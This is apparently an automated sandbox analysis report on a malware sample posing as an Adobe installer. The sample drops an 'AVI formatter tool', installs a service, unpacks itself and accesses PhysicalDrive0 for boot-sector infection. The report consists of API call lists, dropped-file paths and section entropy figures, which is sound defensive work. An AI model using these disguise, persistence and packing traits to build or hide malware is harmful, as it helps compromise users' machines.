                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00454B10 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00454B10
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00455338 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455338
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,2_2_0040259B
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,3_2_0040259B
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 2_2_0040219E StartServiceCtrlDispatcherA,2_2_0040219E
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 2_2_0040219E StartServiceCtrlDispatcherA,2_2_0040219E
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_0040219E StartServiceCtrlDispatcherA,3_2_0040219E
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter toolJump to behavior
                Source: C:\Users\user\Desktop\adobe.exeFile created: C:\Users\user\AppData\Local\Temp\is-D33JM.tmpJump to behavior
                Source: C:\Users\user\Desktop\adobe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\adobe.exeFile read: C:\Users\user\Desktop\adobe.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\adobe.exe C:\Users\user\Desktop\adobe.exe
                Source: C:\Users\user\Desktop\adobe.exeProcess created: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp "C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp" /SL5="$20466,4603715,54272,C:\Users\user\Desktop\adobe.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess created: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe "C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe" -i
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess created: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe "C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe" -s
                Source: C:\Users\user\Desktop\adobe.exeProcess created: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp "C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp" /SL5="$20466,4603715,54272,C:\Users\user\Desktop\adobe.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess created: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe "C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe" -iJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess created: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe "C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe" -sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpWindow found: window name: TMainFormJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: adobe.exeStatic file information: File size 4855286 > 1048576
                Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-R0SOB.tmp.1.dr
                Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: adobe.tmp, 00000001.00000002.2904468325.000000000072E000.00000004.00000020.00020000.00000000.sdmp, adobe.tmp, 00000001.00000003.1648820462.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, adobe.tmp, 00000001.00000002.2904768508.0000000002313000.00000002.00000001.01000000.00000006.sdmp, adobe.tmp, 00000001.00000003.1648885833.0000000002348000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeUnpacked PE file: 2.2.aviformattertool.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;_vset_8:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeUnpacked PE file: 3.2.aviformattertool.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;_vset_8:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeUnpacked PE file: 2.2.aviformattertool.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeUnpacked PE file: 3.2.aviformattertool.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
                Source: initial sampleStatic PE information: section where entry point is pointing to: petite
                Source: aviformattertool.exe.1.drStatic PE information: section name: _vset_8
                Source: is-LAMVM.tmp.1.drStatic PE information: section name: .sxdata
                Source: is-1V9NR.tmp.1.drStatic PE information: section name: .didata
                Source: is-ETIM8.tmp.1.drStatic PE information: section name:
                Source: is-ETIM8.tmp.1.drStatic PE information: section name:
                Source: is-ETIM8.tmp.1.drStatic PE information: section name: petite
                Source: is-N9KV6.tmp.1.drStatic PE information: section name:
                Source: is-N9KV6.tmp.1.drStatic PE information: section name:
                Source: is-N9KV6.tmp.1.drStatic PE information: section name:
                Source: is-SD2K4.tmp.1.drStatic PE information: section name:
                Source: is-SD2K4.tmp.1.drStatic PE information: section name:
                Source: is-SD2K4.tmp.1.drStatic PE information: section name: petite
                Source: is-CHQ62.tmp.1.drStatic PE information: section name:
                Source: is-CHQ62.tmp.1.drStatic PE information: section name:
                Source: is-CHQ62.tmp.1.drStatic PE information: section name: petite
                Source: is-USOE1.tmp.1.drStatic PE information: section name:
                Source: is-USOE1.tmp.1.drStatic PE information: section name:
                Source: is-USOE1.tmp.1.drStatic PE information: section name:
                Source: is-TA1T4.tmp.1.drStatic PE information: section name:
                Source: is-TA1T4.tmp.1.drStatic PE information: section name:
                Source: is-TA1T4.tmp.1.drStatic PE information: section name: petite
                Source: is-268GJ.tmp.1.drStatic PE information: section name: /4
                Source: is-O3BDJ.tmp.1.drStatic PE information: section name: /4
                Source: is-2NPHT.tmp.1.drStatic PE information: section name: /4
                Source: is-G2Q7A.tmp.1.drStatic PE information: section name:
                Source: is-G2Q7A.tmp.1.drStatic PE information: section name:
                Source: is-G2Q7A.tmp.1.drStatic PE information: section name: petite
                Source: is-RTU9Q.tmp.1.drStatic PE information: section name:
                Source: is-RTU9Q.tmp.1.drStatic PE information: section name: petite
                Source: is-QIBJG.tmp.1.drStatic PE information: section name:
                Source: is-QIBJG.tmp.1.drStatic PE information: section name:
                Source: is-QIBJG.tmp.1.drStatic PE information: section name:
                Source: is-G867L.tmp.1.drStatic PE information: section name:
                Source: is-G867L.tmp.1.drStatic PE information: section name:
                Source: is-G867L.tmp.1.drStatic PE information: section name:
                Source: is-B8D2L.tmp.1.drStatic PE information: section name: /4
                Source: is-6BR28.tmp.1.drStatic PE information: section name: .eh_fram
                Source: is-5PBSD.tmp.1.drStatic PE information: section name: asmcode
                Source: is-5EUCF.tmp.1.drStatic PE information: section name: .eh_fram
                Source: is-G9QV0.tmp.1.drStatic PE information: section name: /4
                Source: is-B5I6T.tmp.1.drStatic PE information: section name: /4
                Source: is-GDO6P.tmp.1.drStatic PE information: section name: /4
                Source: is-JAMVB.tmp.1.drStatic PE information: section name: /4
                Source: is-R0SOB.tmp.1.drStatic PE information: section name: .trace
                Source: is-R0SOB.tmp.1.drStatic PE information: section name: _RDATA
                Source: is-R0SOB.tmp.1.drStatic PE information: section name: .debug_o
                Source: is-DGTCL.tmp.1.drStatic PE information: section name: /4
                Source: is-L5R6H.tmp.1.drStatic PE information: section name: /4
                Source: is-P1JK8.tmp.1.drStatic PE information: section name: /4
                Source: is-TS18M.tmp.1.drStatic PE information: section name: /4
                Source: is-OJAID.tmp.1.drStatic PE information: section name: /4
                Source: is-JAAP8.tmp.1.drStatic PE information: section name: /4
                Source: is-29FOL.tmp.1.drStatic PE information: section name: /4
                Source: is-H7480.tmp.1.drStatic PE information: section name: /4
                Source: JSON Nested Objects 66.exe.2.drStatic PE information: section name: _vset_8
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_0040CCA4 push esi; iretd 0_2_0040CDA1
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_0040CD83 push esi; iretd 0_2_0040CDA1
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00409954 push 00409991h; ret 1_2_00409989
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0040A04F push ds; ret 1_2_0040A050
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0040A023 push ds; ret 1_2_0040A04D
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax1_2_004062CD
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004824F8 push 004825D6h; ret 1_2_004825CE
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx1_2_004106E5
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00476724 push ecx; mov dword ptr [esp], edx1_2_00476725
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00458AF0 push 00458B34h; ret 1_2_00458B2C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00442C94 push ecx; mov dword ptr [esp], ecx1_2_00442C98
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00450E68 push 00450E9Bh; ret 1_2_00450E93
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0045102C push ecx; mov dword ptr [esp], eax1_2_00451031
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx1_2_0040D03A
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004572B0 push 004572E8h; ret 1_2_004572E0
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00493310 push ecx; mov dword ptr [esp], ecx1_2_00493315
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0045F544 push ecx; mov dword ptr [esp], ecx1_2_0045F548
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx1_2_0040F59A
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                Source: initial sampleStatic PE information: section name: .text entropy: 7.585918071864499
                Source: initial sampleStatic PE information: section name: _vset_8 entropy: 7.629148676433318
                Source: initial sampleStatic PE information: section name: entropy: 7.921519965168042
                Source: initial sampleStatic PE information: section name: entropy: 7.966771808365004
                Source: initial sampleStatic PE information: section name: entropy: 7.950928332152424
                Source: initial sampleStatic PE information: section name: entropy: 7.953893773659523
                Source: initial sampleStatic PE information: section name: entropy: 7.491817342209834
                Source: initial sampleStatic PE information: section name: .text entropy: 7.585918071864499
                Source: initial sampleStatic PE information: section name: _vset_8 entropy: 7.629148676433318

                Persistence and Installation Behavior

                barindex
                Contains functionality to infect the boot sector
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive02_2_00401A4F
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive03_2_00401A4F
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive03_2_02A1F823
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-P1JK8.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeFile created: C:\ProgramData\JSON Nested Objects 66\JSON Nested Objects 66.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libwebp.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-LAMVM.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-N9KV6.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\da.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-GDO6P.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-QIBJG.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\is-29FOL.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basscd.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\sd.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_RegDLL.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\daiso.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswv.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassopus.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_tta.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-GV1D3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-OJAID.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libsoxr.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-62TD5.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dstt.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-2NPHT.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G867L.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-6BR28.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-NLBLP.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-DGTCL.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G2Q7A.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\basswma.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmidi.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_ofr.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-O3BDJ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\mp3gain.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\7z.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-USOE1.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-B5I6T.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TS18M.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\uchardet.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-ETIM8.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassmix.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-SD2K4.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\plugins\internal\is-H7480.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-1V9NR.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-G9QV0.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\Temp\is-6RNA5.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\takdec.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\is-D26SF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-L5R6H.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-M7I8F.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-JAAP8.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\lame_enc.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\ff_helper.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bass_fx.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-7MMUT.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-TA1T4.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-B8D2L.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\utils.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\is-268GJ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\bassflac.dll (copy)Jump to dropped file
